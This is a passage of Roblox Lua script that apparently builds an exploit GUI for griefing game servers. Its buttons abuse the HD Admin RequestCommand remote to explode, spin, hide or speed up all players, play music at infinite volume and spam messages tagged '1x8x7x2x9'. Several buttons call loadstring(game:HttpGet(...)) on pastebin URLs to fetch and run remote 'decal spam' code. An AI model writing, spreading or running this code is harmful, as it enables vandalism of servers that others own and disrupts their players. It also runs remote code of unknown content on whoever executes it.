0.3, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Bangrangrang" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";music 82685880394495") RequestCommand:InvokeServer(";pitch 0.27") RequestCommand:InvokeServer(";volume inf") end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.99, 0, 0.4, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "pickle music" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";music 81933593523755") RequestCommand:InvokeServer(";pitch 0.12") RequestCommand:InvokeServer(";volume inf") end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.68, 0, 0.65, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "invis all" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";invisible all") end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.68, 0, 0.71, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Teams" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";createteam red 1x8x7x2x9") RequestCommand:InvokeServer(";createteam blue 1x8x7x2x9") RequestCommand:InvokeServer(";createteam green 1x8x7x2x9") RequestCommand:InvokeServer(";createteam pink 1x8x7x2x9") RequestCommand:InvokeServer(";createteam yellow 1x8x7x2x9") RequestCommand:InvokeServer(";createteam orange 1x8x7x2x9") RequestCommand:InvokeServer(";createteam black 1x8x7x2x9") RequestCommand:InvokeServer(";createteam white 1x8x7x2x9") end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.010, 0, 0.65, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Decal spam 2" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() loadstring(game:HttpGet('https://pastebin.com/raw/m9ZRhWBy',true))() end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.010, 0, 0.71, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Macedonia decal" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() loadstring(game:HttpGet('https://pastebin.com/raw/9rPnupHH',true))() end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.010, 0, 0.84, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Mario.exe" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() loadstring(game:HttpGet('https://pastebin.com/raw/jANPGLNQ',true))() end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.34, 0, 0.84, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Night" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";time 1") end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.68, 0, 0.84, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Hint" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";Hint Team 1x8x7x2x9 Join Today!") end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.68, 0, 0.91, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Spin all" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";Spin all") end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.34, 0, 0.91, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Explode all" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";Explode all") end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.01, 0, 0.91, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Speed all 200" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 15 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";Speed all 200") end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.99, 0, 0.49, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "RAINING MEN" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";music 104497567166761") RequestCommand:InvokeServer(";pitch 0.27") RequestCommand:InvokeServer(";volume inf") end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.99, 0, 0.59, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Minecraft Music" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";music 92791220683514") RequestCommand:InvokeServer(";pitch 0.20") RequestCommand:InvokeServer(";volume inf") end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.99, 0, 0.69, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "c00lkidd theme" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";music 77484784570543") RequestCommand:InvokeServer(";pitch 0.09") RequestCommand:InvokeServer(";volume inf") end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.99, 0, 0.79, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "hoodtrap" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";music 107990547300911") RequestCommand:InvokeServer(";volume inf") end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.01, 0, 0.22, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "sparta remix spaghetti" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";music 99907604701668") RequestCommand:InvokeServer(";pitch 0.13") RequestCommand:InvokeServer(";volume inf") end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.35, 0, 0.22, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "T4C0X Decal spam" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() loadstring(game:HttpGet('https://pastebin.com/raw/Q8AMFyS5',true))() end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.68, 0, 0.77, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "1x8x7x2x9 was here" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";titlep all 1x8x7x2x9 was here...") end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.34, 0, 0.77, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Fog" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";fog") RequestCommand:InvokeServer(";fogColor black") RequestCommand:InvokeServer(";time 1") end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.01, 0, 0.77, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "R15" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";R15") end) local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.999, 0, 0.04, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "Thomas music" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() local ReplicatedStorage = game:GetService("ReplicatedStorage") local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommand RequestCommand:InvokeServer(";music 135091445773346") RequestCommand:InvokeServer(";pitch 0.19") RequestCommand:InvokeServer(";volume inf") end)local scriptbyblue2spooky = Instance.new("TextButton") scriptbyblue2spooky.Size = UDim2.new(0, 120, 0, 40) scriptbyblue2spooky.Position = UDim2.new(0.69, 0, 0.22, 0) scriptbyblue2spooky.BackgroundColor3 = Color3.new(0, 0, 0) scriptbyblue2spooky.BorderSizePixel = 1 scriptbyblue2spooky.BorderColor3 = Color3.fromRGB(143,0,255) scriptbyblue2spooky.Font = Enum.Font.JosefinSans scriptbyblue2spooky.Text = "T4C0X Decal spam" scriptbyblue2spooky.TextColor3 = Color3.new(1, 1, 1) scriptbyblue2spooky.TextSize = 20 scriptbyblue2spooky.TextWrapped = true scriptbyblue2spooky.Parent = mainFrame scriptbyblue2spooky.MouseButton1Click:Connect(function() loadstring(game:HttpGet('https://pastebin.com/raw/KMxiHCu3',true))() end)